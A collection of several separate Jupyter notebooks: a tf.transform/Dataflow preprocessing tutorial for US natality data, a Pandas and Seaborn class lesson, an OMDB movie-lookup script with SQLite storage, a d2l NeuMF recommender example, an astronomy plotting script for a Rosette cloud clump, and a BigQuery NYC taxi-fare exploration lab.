<li> Creating datasets for Machine Learning using tf.transform and Dataflow
</ol>
<p>
While Pandas is fine for experimenting, for operationalization of your workflow, it is better to do preprocessing in Apache Beam. This will also help if you need to preprocess data in flight, since Apache Beam also allows for streaming.
Apache Beam only works in Python 2 at the moment, so we're going to switch to the Python 2 kernel. In the above menu, click the dropdown arrow and select `python2`. 
Then activate a Python 2 environment and install Apache Beam. Only specific combinations of TensorFlow/Beam are supported by tf.transform. So make sure to get a combo that is.
* TFT 0.8.0
* TF 1.8 or higher
* Apache Beam [GCP] 2.5.0 or higher
```
%%bash
source activate py2env
pip uninstall -y google-cloud-dataflow
conda install -y pytz==2018.4
pip install apache-beam[gcp] tensorflow_transform==0.8.0
%%bash
pip freeze | grep -e 'flow\|beam'
```
You need to restart your kernel to register the new installs running the below cells
```
import tensorflow as tf
import apache_beam as beam
print(tf.__version__)
# change these to try this notebook out
BUCKET = 'cloud-training-demos-ml' # REPLACE WITH YOUR PROJECT ID
PROJECT = 'cloud-training-demos' # REPLACE WITH YOUR BUCKET NAME
REGION = 'us-central1'
import os
os.environ['BUCKET'] = BUCKET
os.environ['PROJECT'] = PROJECT
os.environ['REGION'] = REGION
!gcloud config set project $PROJECT
%%bash
if ! gsutil ls | grep -q gs://${BUCKET}/; then
gsutil mb -l ${REGION} gs://${BUCKET}
fi
```
<h2> Save the query from earlier </h2>
The data is natality data (record of births in the US). My goal is to predict the baby's weight given a number of factors about the pregnancy and the baby's mother. Later, we will want to split the data into training and eval datasets. The hash of the year-month will be used for that.
```
query="""
SELECT
weight_pounds,
is_male,
mother_age,
mother_race,
plurality,
gestation_weeks,
mother_married,
ever_born,
cigarette_use,
alcohol_use,
FARM_FINGERPRINT(CONCAT(CAST(YEAR AS STRING), CAST(month AS STRING))) AS hashmonth
FROM
publicdata.samples.natality
WHERE year > 2000
"""
import google.datalab.bigquery as bq
df = bq.Query(query + " LIMIT 100").execute().result().to_dataframe()
df.head()
```
<h2> Create ML dataset using tf.transform and Dataflow </h2>
<p>
Let's use Cloud Dataflow to read in the BigQuery data and write it out as CSV files. Along the way, let's use tf.transform to do scaling and transforming. Using tf.transform allows us to save the metadata to ensure that the appropriate transformations get carried out during prediction as well.
<p>
Note that after you launch this, the notebook won't show you progress. Go to the GCP webconsole to the Dataflow section and monitor the running job. It took about <b>30 minutes</b> for me. If you wish to continue without doing this step, you can copy my preprocessed output:
<pre>
gsutil -m cp -r gs://cloud-training-demos/babyweight/preproc_tft gs://your-bucket/
</pre>
```
%writefile requirements.txt
tensorflow-transform==0.8.0
import datetime
import apache_beam as beam
import tensorflow_transform as tft
from tensorflow_transform.beam import impl as beam_impl
def preprocess_tft(inputs):
import copy
import numpy as np
def center(x):
return x - tft.mean(x)
result = copy.copy(inputs) # shallow copy
result['mother_age_tft'] = center(inputs['mother_age'])
result['gestation_weeks_centered'] = tft.scale_to_0_1(inputs['gestation_weeks'])
result['mother_race_tft'] = tft.string_to_int(inputs['mother_race'])
return result
#return inputs
def cleanup(rowdict):
import copy, hashlib
CSV_COLUMNS = 'weight_pounds,is_male,mother_age,mother_race,plurality,gestation_weeks,mother_married,cigarette_use,alcohol_use'.split(',')
STR_COLUMNS = 'key,is_male,mother_race,mother_married,cigarette_use,alcohol_use'.split(',')
FLT_COLUMNS = 'weight_pounds,mother_age,plurality,gestation_weeks'.split(',')
# add any missing columns, and correct the types
def tofloat(value, ifnot):
try:
return float(value)
except (ValueError, TypeError):
return ifnot
result = {
k : str(rowdict[k]) if k in rowdict else 'None' for k in STR_COLUMNS
}
result.update({
k : tofloat(rowdict[k], -99) if k in rowdict else -99 for k in FLT_COLUMNS
})
# modify opaque numeric race code into human-readable data
races = dict(zip([1,2,3,4,5,6,7,18,28,39,48],
['White', 'Black', 'American Indian', 'Chinese',
'Japanese', 'Hawaiian', 'Filipino',
'Asian Indian', 'Korean', 'Samaon', 'Vietnamese']))
if 'mother_race' in rowdict and rowdict['mother_race'] in races:
result['mother_race'] = races[rowdict['mother_race']]
else:
result['mother_race'] = 'Unknown'
# cleanup: write out only the data we that we want to train on
if result['weight_pounds'] > 0 and result['mother_age'] > 0 and result['gestation_weeks'] > 0 and result['plurality'] > 0:
data = ','.join([str(result[k]) for k in CSV_COLUMNS])
result['key'] = hashlib.sha224(data).hexdigest()
yield result
def preprocess(query, in_test_mode):
import os
import os.path
import tempfile
import tensorflow as tf
from apache_beam.io import tfrecordio
from tensorflow_transform.coders import example_proto_coder
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from tensorflow_transform.beam.tft_beam_io import transform_fn_io
job_name = 'preprocess-babyweight-features' + '-' + datetime.datetime.now().strftime('%y%m%d-%H%M%S')
if in_test_mode:
import shutil
print('Launching local job ... hang on')
OUTPUT_DIR = './preproc_tft'
shutil.rmtree(OUTPUT_DIR, ignore_errors=True)
else:
print('Launching Dataflow job {} ... hang on'.format(job_name))
OUTPUT_DIR = 'gs://{0}/babyweight/preproc_tft/'.format(BUCKET)
import subprocess
subprocess.call('gsutil rm -r {}'.format(OUTPUT_DIR).split())
options = {
'staging_location': os.path.join(OUTPUT_DIR, 'tmp', 'staging'),
'temp_location': os.path.join(OUTPUT_DIR, 'tmp'),
'job_name': job_name,
'project': PROJECT,
'max_num_workers': 24,
'teardown_policy': 'TEARDOWN_ALWAYS',
'no_save_main_session': True,
'requirements_file': 'requirements.txt'
}
opts = beam.pipeline.PipelineOptions(flags=[], **options)
if in_test_mode:
RUNNER = 'DirectRunner'
else:
RUNNER = 'DataflowRunner'
# set up metadata
raw_data_schema = {
colname : dataset_schema.ColumnSchema(tf.string, [], dataset_schema.FixedColumnRepresentation())
for colname in 'key,is_male,mother_race,mother_married,cigarette_use,alcohol_use'.split(',')
}
raw_data_schema.update({
colname : dataset_schema.ColumnSchema(tf.float32, [], dataset_schema.FixedColumnRepresentation())
for colname in 'weight_pounds,mother_age,plurality,gestation_weeks'.split(',')
})
raw_data_metadata = dataset_metadata.DatasetMetadata(dataset_schema.Schema(raw_data_schema))
def read_rawdata(p, step, test_mode):
if step == 'train':
selquery = 'SELECT * FROM ({}) WHERE ABS(MOD(hashmonth, 4)) < 3'.format(query)
else:
selquery = 'SELECT * FROM ({}) WHERE ABS(MOD(hashmonth, 4)) = 3'.format(query)
if in_test_mode:
selquery = selquery + ' LIMIT 100'
#print('Processing {} data from {}'.format(step, selquery))
return (p
| '{}_read'.format(step) >> beam.io.Read(beam.io.BigQuerySource(query=selquery, use_standard_sql=True))
| '{}_cleanup'.format(step) >> beam.FlatMap(cleanup)
)
# run Beam
with beam.Pipeline(RUNNER, options=opts) as p:
with beam_impl.Context(temp_dir=os.path.join(OUTPUT_DIR, 'tmp')):
# analyze and transform training
raw_data = read_rawdata(p, 'train', in_test_mode)
raw_dataset = (raw_data, raw_data_metadata)
transformed_dataset, transform_fn = (
raw_dataset | beam_impl.AnalyzeAndTransformDataset(preprocess_tft))
transformed_data, transformed_metadata = transformed_dataset
_ = transformed_data | 'WriteTrainData' >> tfrecordio.WriteToTFRecord(
os.path.join(OUTPUT_DIR, 'train'),
coder=example_proto_coder.ExampleProtoCoder(
transformed_metadata.schema))
# transform eval data
raw_test_data = read_rawdata(p, 'eval', in_test_mode)
raw_test_dataset = (raw_test_data, raw_data_metadata)
transformed_test_dataset = (
(raw_test_dataset, transform_fn) | beam_impl.TransformDataset())
transformed_test_data, _ = transformed_test_dataset
_ = transformed_test_data | 'WriteTestData' >> tfrecordio.WriteToTFRecord(
os.path.join(OUTPUT_DIR, 'eval'),
coder=example_proto_coder.ExampleProtoCoder(
transformed_metadata.schema))
_ = (transform_fn
| 'WriteTransformFn' >>
transform_fn_io.WriteTransformFn(os.path.join(OUTPUT_DIR, 'metadata')))
job = p.run()
if in_test_mode:
job.wait_until_finish()
print("Done!")
preprocess(query, in_test_mode=False)
%%bash
gsutil ls gs://${BUCKET}/babyweight/preproc_tft/*-00000*
```
Copyright 2017 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License
| github_jupyter |
# CSE 6040, Fall 2015 [08]: Data analysis and visualization
In todays class, we will first introduce a data analysis tools called **Pandas**,
and then show how to visualize the data using a module called **Seaborn**.
Most of the examples come from
[Pandas tutorial](http://pandas.pydata.org/pandas-docs/stable/tutorials.html)
and
[Seaborn tutorial](http://stanford.edu/~mwaskom/software/seaborn/tutorial.html).
## Part 1: Data analysis using Pandas
Pandas is pre-installed with Anaconda.
Let's try to import it.
```
import pandas as pd
```
## Create Data
The data set will consist of 5 baby names and the number of births recorded for that year (1880).
```
# The inital set of baby names and bith rates
names = ['Bob','Jessica','Mary','John','Mel']
births = [968, 155, 77, 578, 973]
```
To merge these two lists together we will use the zip function.
```
BabyDataSet = zip(names,births)
BabyDataSet
```
We are basically done creating the data set. We now will use the **pandas** library to export this data set into a csv file.
We will create a DataFrame object. You can think of this object holding the contents of the BabyDataSet in a format similar to an excel spreadsheet.
```
df = pd.DataFrame(data = BabyDataSet, columns=['Names', 'Births'])
df
```
Export the dataframe to a ***csv*** file. We can name the file ***births1880.csv***. The function ***to_csv*** will be used to export the file. The file will be saved in the same location of the notebook unless specified otherwise.
```
df.to_csv('births1880.csv',index=False,header=False)
```
## Get Data
To pull in the csv file, we will use the pandas function *read_csv*. Let us take a look at this function and what inputs it takes.
```
df = pd.read_csv("births1880.csv")
df
```
This brings us the our first problem of the exercise. The ***read_csv*** function treated the first record in the csv file as the header names. This is obviously not correct since the text file did not provide us with header names.
To correct this we will pass the ***header*** parameter to the *read_csv* function and set it to ***None*** (means null in python).
```
df = pd.read_csv("births1880.csv", header=None)
df
```
If we wanted to give the columns specific names, we would have to pass another paramter called ***names***. We can also omit the *header* parameter.
```
df = pd.read_csv("births1880.csv", names=['Names','Births'])
df
```
It is also possible to read in a csv file by passing an url address
Here we use the famous [Iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set).
The data set consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor). Four features were measured from each sample: the length and the width of the sepals and petals.
```
df = pd.read_csv("https://raw.githubusercontent.com/bigmlcom/bigmler/master/data/iris.csv")
df.head(10)
```
## Analyze Data
```
# show basic statistics
df.describe()
# Select a column
df["sepal length"].head()
# select columns
df[["sepal length", "petal width"]].head()
# select rows by name
df.loc[5:10]
# select rows by position
df.iloc[5:10]
# select rows by condition
df[df["sepal length"] > 5.0]
```
We can get the maximum sepal length by
```
df["sepal length"].max()
```
If we want to find full information of the flower with maximum sepal length
```
df.sort("sepal length", ascending=False).head(1)
```
## Exercise
Print the full information of the flower whose petal length is the second shortest in the 50 Iris-setosa flowers
```
df.sort("petal length", ascending=True)
df.iloc[1]
```
Pandas also has some basic plotting functions.
```
import matplotlib.pyplot as plt
%matplotlib inline
df.hist()
```
# Part 2: Visualization using Seaborn
Seaborn is not installed by default in Anaconda.
Try install it using pip: **pip install seaborn**.
```
import seaborn as sns
# make the plots to show right below the codes
% matplotlib inline
```
## Plotting univariate distributions
distplot() function will draw a histogram and fit a kernel density estimate
```
import numpy as np
x = np.random.normal(size=100)
sns.distplot(x)
import random
x = [random.normalvariate (0, 1) for i in range (0, 1000)]
sns.distplot (x)
```
## Plotting bivariate distributions
```
mean, cov = [0, 1], [(1, .5), (.5, 1)]
data = np.random.multivariate_normal(mean, cov, 200)
df = pd.DataFrame(data, columns=["x", "y"])
```
### Scatter plot
```
sns.jointplot(x="x", y="y", data=df)
```
### Hexbin plot
```
sns.jointplot(x="x", y="y", data=df, kind="hex")
```
### Kernel density estimation
```
sns.jointplot(x="x", y="y", data=df, kind="kde")
```
## Visualizing pairwise relationships in a dataset
To plot multiple pairwise bivariate distributions in a dataset, you can use the pairplot() function. This creates a matrix of axes and shows the relationship for each pair of columns in a DataFrame. by default, it also draws the univariate distribution of each variable on the diagonal Axes:
```
iris = sns.load_dataset("iris")
sns.pairplot(iris)
# we can add colors to different species
sns.pairplot(iris, hue="species")
```
### Visualizing linear relationships
```
tips = sns.load_dataset("tips")
tips.head()
```
We can use the function `regplot` to show the linear relationship between total_bill and tip.
It also shows the 95% confidence interval.
```
sns.regplot(x="total_bill", y="tip", data=tips)
```
### Visualizing higher order relationships
```
anscombe = sns.load_dataset("anscombe")
sns.regplot(x="x", y="y", data=anscombe[anscombe["dataset"] == "II"])
```
The plot clearly shows that this is not a good model.
Let's try to fit a polynomial regression model with degree 2.
```
sns.regplot(x="x", y="y", data=anscombe[anscombe["dataset"] == "II"], order=2)
```
### Strip mplots
This is similar to scatter plot but used when one variable is categorical.
```
sns.stripplot(x="day", y="total_bill", data=tips)
```
### Boxplots
```
sns.boxplot(x="day", y="total_bill", hue="time", data=tips)
```
### Bar plots
```
titanic = sns.load_dataset("titanic")
sns.barplot(x="sex", y="survived", hue="class", data=titanic)
```
| github_jupyter |
## This notebook does the following
* **Retrieves and prints basic data about a movie (title entered by user) from the web (OMDB database)**
* **If a poster of the movie could be found, it downloads the file and saves at a user-specified location**
* **Finally, stores the movie data in a local SQLite database**
```
import urllib.request, urllib.parse, urllib.error
import json
```
### Gets the secret API key (you have to get one from OMDB website and use that, 1000 daily limit) from a JSON file, stored in the same folder
```
with open('APIkeys.json') as f:
keys = json.load(f)
omdbapi = keys['OMDBapi']
serviceurl = 'http://www.omdbapi.com/?'
apikey = '&apikey='+omdbapi
```
### Function for printing a JSON dataset
```
def print_json(json_data):
list_keys=['Title', 'Year', 'Rated', 'Released', 'Runtime', 'Genre', 'Director', 'Writer',
'Actors', 'Plot', 'Language', 'Country', 'Awards', 'Ratings',
'Metascore', 'imdbRating', 'imdbVotes', 'imdbID']
print("-"*50)
for k in list_keys:
if k in list(json_data.keys()):
print(f"{k}: {json_data[k]}")
print("-"*50)
```
### Function to download a poster of the movie based on the information from the jason dataset
**Saves the downloaded poster in a local directory called 'Posters'**
```
def save_poster(json_data):
import os
title = json_data['Title']
poster_url = json_data['Poster']
# Splits the poster url by '.' and picks up the last string as file extension
poster_file_extension=poster_url.split('.')[-1]
# Reads the image file from web
poster_data = urllib.request.urlopen(poster_url).read()
savelocation=os.getcwd()+'\\'+'Posters'+'\\'
# Creates new directory if the directory does not exist. Otherwise, just use the existing path.
if not os.path.isdir(savelocation):
os.mkdir(savelocation)
filename=savelocation+str(title)+'.'+poster_file_extension
f=open(filename,'wb')
f.write(poster_data)
f.close()
```
### Function to create/update the local movie database with the data retreived from the web
**Saves the movie data (Title, Year, Runtime, Country, Metascore, and IMDB rating) into a local SQLite database called 'movieinfo.sqlite'**
```
def save_in_database(json_data):
filename = input("Please enter a name for the database (extension not needed, it will be added automatically): ")
filename = filename+'.sqlite'
import sqlite3
conn = sqlite3.connect(str(filename))
cur=conn.cursor()
title = json_data['Title']
# Goes through the json dataset and extracts information if it is available
if json_data['Year']!='N/A':
year = int(json_data['Year'])
if json_data['Runtime']!='N/A':
runtime = int(json_data['Runtime'].split()[0])
if json_data['Country']!='N/A':
country = json_data['Country']
if json_data['Metascore']!='N/A':
metascore = float(json_data['Metascore'])
else:
metascore=-1
if json_data['imdbRating']!='N/A':
imdb_rating = float(json_data['imdbRating'])
else:
imdb_rating=-1
# SQL commands
cur.execute('''CREATE TABLE IF NOT EXISTS MovieInfo
(Title TEXT, Year INTEGER, Runtime INTEGER, Country TEXT, Metascore REAL, IMDBRating REAL)''')
cur.execute('SELECT Title FROM MovieInfo WHERE Title = ? ', (title,))
row = cur.fetchone()
if row is None:
cur.execute('''INSERT INTO MovieInfo (Title, Year, Runtime, Country, Metascore, IMDBRating)
VALUES (?,?,?,?,?,?)''', (title,year,runtime,country,metascore,imdb_rating))
else:
print("Record already found. No update made.")
# Commits the change and close the connection to the database
conn.commit()
conn.close()
```
### Function to print contents of the local database
```
def print_database(database):
import sqlite3
conn = sqlite3.connect(str(database))
cur=conn.cursor()
for row in cur.execute('SELECT * FROM MovieInfo'):
print(row)
conn.close()
```
### Function to save the database content in an Excel file
```
def save_in_excel(filename, database):
if filename.split('.')[-1]!='xls' and filename.split('.')[-1]!='xlsx':
print ("Filename does not have correct extension. Please try again")
return None
import pandas as pd
import sqlite3
#df=pd.DataFrame(columns=['Title','Year', 'Runtime', 'Country', 'Metascore', 'IMDB_Rating'])
conn = sqlite3.connect(str(database))
#cur=conn.cursor()
df=pd.read_sql_query("SELECT * FROM MovieInfo", conn)
conn.close()
df.to_excel(filename,sheet_name='Movie Info')
```
### Function to search for information about a movie
```
def search_movie(title):
if len(title) < 1 or title=='quit':
print("Goodbye now...")
return None
try:
url = serviceurl + urllib.parse.urlencode({'t': title})+apikey
print(f'Retrieving the data of "{title}" now... ')
uh = urllib.request.urlopen(url)
data = uh.read()
json_data=json.loads(data)
if json_data['Response']=='True':
print_json(json_data)
# Asks user whether to download the poster of the movie
if json_data['Poster']!='N/A':
poster_yes_no=input ('Poster of this movie can be downloaded. Enter "yes" or "no": ').lower()
if poster_yes_no=='yes':
save_poster(json_data)
# Asks user whether to save the movie information in a local database
save_database_yes_no=input ('Save the movie info in a local database? Enter "yes" or "no": ').lower()
if save_database_yes_no=='yes':
save_in_database(json_data)
else:
print("Error encountered: ",json_data['Error'])
except urllib.error.URLError as e:
print(f"ERROR: {e.reason}")
```
#### Search for 'Titanic'
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Show the downloaded poster of 'Titanic'
```
from IPython.display import Image
Image("Posters/Titanic.jpg")
```
#### Print the content of the local database, only single entry so far
```
print_database('movies.sqlite')
```
#### Search for 'Jumanji'
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Search for "To kill a mockingbird"
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Search for "Titanic" again, note while trying to save the record, the message from the database connection saying 'Record already found'
```
title = input('\nEnter the name of a movie (enter \'quit\' or hit ENTER to quit): ')
if len(title) < 1 or title=='quit':
print("Goodbye now...")
else:
search_movie(title)
```
#### Print the database contents again
```
print_database('movies.sqlite')
```
#### Save the database content into an Excel file
```
save_in_excel('test.xlsx','movies.sqlite')
import pandas as pd
df=pd.read_excel('test.xlsx')
df
```
| github_jupyter |
http://preview.d2l.ai/d2l-en/master/chapter_recommender-systems/neumf.html
```
from d2l import mxnet as d2l
from mxnet import autograd, gluon, np, npx
from mxnet.gluon import nn
import mxnet as mx
import random
import sys
npx.set_np()
class NeuMF(nn.Block):
def __init__(self, num_factors, num_users, num_items, nums_hiddens,
**kwargs):
super(NeuMF, self).__init__(**kwargs)
self.P = nn.Embedding(num_users, num_factors)
self.Q = nn.Embedding(num_items, num_factors)
self.U = nn.Embedding(num_users, num_factors)
self.V = nn.Embedding(num_items, num_factors)
self.mlp = nn.Sequential()
for num_hiddens in nums_hiddens:
self.mlp.add(nn.Dense(num_hiddens, activation='relu',
use_bias=True))
def forward(self, user_id, item_id):
p_mf = self.P(user_id)
q_mf = self.Q(item_id)
gmf = p_mf * q_mf
p_mlp = self.U(user_id)
q_mlp = self.V(item_id)
mlp = self.mlp(np.concatenate([p_mlp, q_mlp], axis=1))
con_res = np.concatenate([gmf, mlp], axis=1)
return np.sum(con_res, axis=-1)
class PRDataset(gluon.data.Dataset):
def __init__(self, users, items, candidates, num_items):
self.users = users
self.items = items
self.cand = candidates
self.all = set([i for i in range(num_items)])
def __len__(self):
return len(self.users)
def __getitem__(self, idx):
neg_items = list(self.all - set(self.cand[int(self.users[idx])]))
indices = random.randint(0, len(neg_items) - 1)
return self.users[idx], self.items[idx], neg_items[indices]
#@save
def hit_and_auc(rankedlist, test_matrix, k):
hits_k = [(idx, val) for idx, val in enumerate(rankedlist[:k])
if val in set(test_matrix)]
hits_all = [(idx, val) for idx, val in enumerate(rankedlist)
if val in set(test_matrix)]
max = len(rankedlist) - 1
auc = 1.0 * (max - hits_all[0][0]) / max if len(hits_all) > 0 else 0
return len(hits_k), auc
#@save
def evaluate_ranking(net, test_input, seq, candidates, num_users, num_items,
devices):
ranked_list, ranked_items, hit_rate, auc = {}, {}, [], []
all_items = set([i for i in range(num_users)])
for u in range(num_users):
neg_items = list(all_items - set(candidates[int(u)]))
user_ids, item_ids, x, scores = [], [], [], []
[item_ids.append(i) for i in neg_items]
[user_ids.append(u) for _ in neg_items]
x.extend([np.array(user_ids)])
if seq is not None:
x.append(seq[user_ids, :])
x.extend([np.array(item_ids)])
test_data_iter = gluon.data.DataLoader(
gluon.data.ArrayDataset(*x), shuffle=False, last_batch="keep",
batch_size=1024)
for index, values in enumerate(test_data_iter):
x = [gluon.utils.split_and_load(v, devices, even_split=False)
for v in values]
scores.extend([list(net(*t).asnumpy()) for t in zip(*x)])
scores = [item for sublist in scores for item in sublist]
item_scores = list(zip(item_ids, scores))
ranked_list[u] = sorted(item_scores, key=lambda t: t[1], reverse=True)
ranked_items[u] = [r[0] for r in ranked_list[u]]
temp = hit_and_auc(ranked_items[u], test_input[u], 50)
hit_rate.append(temp[0])
auc.append(temp[1])
return np.mean(np.array(hit_rate)), np.mean(np.array(auc))
#@save
def train_ranking(net, train_iter, test_iter, loss, trainer, test_seq_iter,
num_users, num_items, num_epochs, devices, evaluator,
candidates, eval_step=1):
timer, hit_rate, auc = d2l.Timer(), 0, 0
animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs], ylim=[0, 1],
legend=['test hit rate', 'test AUC'])
for epoch in range(num_epochs):
metric, l = d2l.Accumulator(3), 0.
for i, values in enumerate(train_iter):
input_data = []
for v in values:
input_data.append(gluon.utils.split_and_load(v, devices))
with autograd.record():
p_pos = [net(*t) for t in zip(*input_data[0:-1])]
p_neg = [net(*t) for t in zip(*input_data[0:-2],
input_data[-1])]
ls = [loss(p, n) for p, n in zip(p_pos, p_neg)]
[l.backward(retain_graph=False) for l in ls]
l += sum([l.asnumpy() for l in ls]).mean()/len(devices)
trainer.step(values[0].shape[0])
metric.add(l, values[0].shape[0], values[0].size)
timer.stop()
with autograd.predict_mode():
if (epoch + 1) % eval_step == 0:
hit_rate, auc = evaluator(net, test_iter, test_seq_iter,
candidates, num_users, num_items,
devices)
animator.add(epoch + 1, (hit_rate, auc))
print(f'train loss {metric[0] / metric[1]:.3f}, '
f'test hit rate {float(hit_rate):.3f}, test AUC {float(auc):.3f}')
print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec '
f'on {str(devices)}')
batch_size = 1024
df, num_users, num_items = d2l.read_data_ml100k()
train_data, test_data = d2l.split_data_ml100k(df, num_users, num_items,
'seq-aware')
users_train, items_train, ratings_train, candidates = d2l.load_data_ml100k(
train_data, num_users, num_items, feedback="implicit")
users_test, items_test, ratings_test, test_iter = d2l.load_data_ml100k(
test_data, num_users, num_items, feedback="implicit")
train_iter = gluon.data.DataLoader(
PRDataset(users_train, items_train, candidates, num_items ), batch_size,
True, last_batch="rollover", num_workers=d2l.get_dataloader_workers())
devices = d2l.try_all_gpus()
net = NeuMF(10, num_users, num_items, nums_hiddens=[10, 10, 10])
net.initialize(ctx=devices, force_reinit=True, init=mx.init.Normal(0.01))
lr, num_epochs, wd, optimizer = 0.01, 10, 1e-5, 'adam'
loss = d2l.BPRLoss()
trainer = gluon.Trainer(net.collect_params(), optimizer,
{"learning_rate": lr, 'wd': wd})
train_ranking(net, train_iter, test_iter, loss, trainer, None, num_users,
num_items, num_epochs, devices, evaluate_ranking, candidates)
```
| github_jupyter |
## Introduction to the Interstellar Medium
### Jonathan Williams
### Figure 7.9: map of integrated CS J=2-1 emission in a star-forming clump in the Rosette molecular cloud
#### from observations taken with the IRAM 30m telescope by the author in 2002
#### infrared data are from the UKIRT Infrared Deep Sky Survey public release (http://wsa.roe.ac.uk/)
#### uses reproject.py from https://pypi.org/project/reproject/
```
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import fits
from astropy.wcs import WCS
from astropy.visualization import (ImageNormalize, SqrtStretch, LogStretch, AsinhStretch)
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from scipy.ndimage.filters import gaussian_filter
%matplotlib inline
import sys
!{sys.executable} -m pip install reproject
import reproject
fig = plt.figure(figsize=(8, 6.5))
ax = fig.add_subplot(111)
# resample galactic CS to equatorial K band
hdu1 = fits.open('rosette_clump_UKIDSS_K.fits')[0]
hd1 = hdu1.header
hdu2 = fits.open('rosette_clump_IRAM_CS21.fits')[0]
cs, footprint = reproject.reproject_adaptive(hdu2, hd1)
ir = hdu1.data
nx, x0, dx, i0 = hd1['naxis1'], hd1['crval1'], hd1['cdelt1'], hd1['crpix1']
ny, y0, dy, j0 = hd1['naxis2'], hd1['crval2'], hd1['cdelt2'], hd1['crpix2']
# manual crop
imin, imax = 248, 749
jmin, jmax = 345, 735
xmin, xmax = x0+(imax-i0)*dx, x0+(imin-i0)*dx
ymin, ymax = y0+(jmin-j0)*dy, y0+(jmax-j0)*dy
xcen = (xmin+xmax)/2
ycen = (ymin+ymax)/2
xmin, xmax = 3600*(xmin-xcen), 3600*(xmax-xcen)
ymin, ymax = 3600*(ymin-ycen), 3600*(ymax-ycen)
extent = [xmax, xmin, ymin, ymax]
#print(extent)
ir_crop = ir[jmin:jmax, imin:imax]
cs_crop = cs[jmin:jmax, imin:imax]
#print(ir_crop.min(), ir_crop.max())
#print(np.nanmin(cs_crop), np.nanmax(cs_crop))
levs = np.arange(1,8,0.5)
# plot K band image in reverse
norm = ImageNormalize(ir, stretch=AsinhStretch(0.3))
ax.imshow(ir_crop, cmap='gray_r', vmin=2650, vmax=3650, origin='lower', norm=norm, extent=extent)
# lightly smooth CS contours to improve SNR and visual appearance
#ax.contour(cs_crop, levels=levs, colors='black', extent=extent)
ax.contour(gaussian_filter(cs_crop,3), levels=levs, colors='black', extent=extent)
ax.tick_params(direction='in', length=4, width=2, colors='black', labelcolor='black', labelsize=14)
x_labels = ['-80','-60','-40','-20', '0', '20', '40', '60', '80']
x_loc = np.array([float(x) for x in x_labels])
ax.set_xticks(x_loc)
ax.set_xticklabels(x_labels)
ax.set_xlim(extent[0], extent[1])
ax.set_ylim(extent[2], extent[3])
ax.set_xlabel(r"$\Delta\alpha\ ('')$", fontsize=18)
ax.set_ylabel(r"$\Delta\delta\ ('')$", fontsize=18)
ax.text(0.04,0.92, r'CS 2-1 / 2.2$\mu$m', {'color': 'black', 'fontsize': 16}, transform=ax.transAxes)
# 0.2 pc = 26 arcsec at 1600 pc
xbar1 = 82
xbar2 = xbar1 - 26
ybar = -60
ax.fill([xbar1+1,xbar2-1,xbar2-1,xbar1+1], [ybar-3,ybar-3,ybar+6,ybar+6], color='white', alpha=0.7, zorder=99)
ax.plot([xbar1,xbar2], [ybar, ybar], lw=2, color='black', zorder=100)
ax.plot([xbar1,xbar1], [ybar-2, ybar+2], lw=2, color='black', zorder=100)
ax.plot([xbar2,xbar2], [ybar-2, ybar+2], lw=2, color='black', zorder=100)
ax.text(0.5*(xbar1+xbar2), ybar+2, '0.2 pc', ha='center', color='black', fontsize=12, zorder=100)
plt.tight_layout()
plt.savefig('rosette_clump.pdf')
```
| github_jupyter |
# Sample, Explore, and Clean Taxifare Dataset
**Learning Objectives**
- Practice querying BigQuery
- Sample from large dataset in a reproducible way
- Practice exploring data using Pandas
- Identify corrupt data and clean accordingly
## Introduction
In this notebook, we will explore a dataset corresponding to taxi rides in New York City to build a Machine Learning model that estimates taxi fares. The idea is to suggest a likely fare to taxi riders so that they are not surprised, and so that they can protest if the charge is much higher than expected. Such a model would also be useful for ride-hailing apps that quote you the trip price in advance.
### Set up environment variables and load necessary libraries
```
PROJECT = 'cloud-training-demos' # Replace with your PROJECT
REGION = 'us-central1' # Choose an available region for Cloud MLE
import os
os.environ['PROJECT'] = PROJECT
os.environ['REGION'] = REGION
```
Check that the Google BigQuery library is installed and if not, install it.
```
!pip freeze | grep google-cloud-bigquery==1.6.1 || pip install google-cloud-bigquery==1.6.1
```
## View data schema and size
Our dataset is hosted in [BigQuery](https://cloud.google.com/bigquery/): Google's petabyte scale, SQL queryable, fully managed cloud data warehouse. It is a publically available dataset, meaning anyone with a GCP account has access.
1. Click [here](https://console.cloud.google.com/bigquery?project=bigquery-public-data&p=nyc-tlc&d=yellow&t=trips&page=table) to acess the dataset.
2. In the web UI, below the query editor, you will see the schema of the dataset. What fields are available, what does each mean?
3. Click the 'details' tab. How big is the dataset?
## Preview data
Let's see what a few rows of our data looks like. Any cell that starts with `%%bigquery` will be interpreted as a SQL query that is executed on BigQuery, and the result is printed to our notebook.
BigQuery supports [two flavors](https://cloud.google.com/bigquery/docs/reference/standard-sql/migrating-from-legacy-sql#comparison_of_legacy_and_standard_sql) of SQL syntax: legacy SQL and standard SQL. The preferred is standard SQL because it complies with the official SQL:2011 standard. To instruct BigQuery to interpret our syntax as such we start the query with `#standardSQL`.
There are over 1 Billion rows in this dataset and it's 130GB large, so let's retrieve a small sample
```
%%bigquery --project $PROJECT
#standardSQL
SELECT
*
FROM
`nyc-tlc.yellow.trips`
WHERE RAND() < .0000001 -- sample a small fraction of the data
```
### Preview data (alternate way)
Alternatively we can use BigQuery's web UI to execute queries.
1. Open the [web UI](https://console.cloud.google.com/bigquery)
2. Paste the above query minus the `%%bigquery` part into the Query Editor
3. Click the 'Run' button or type 'CTRL + ENTER' to execute the query
Query results will be displayed below the Query editor.
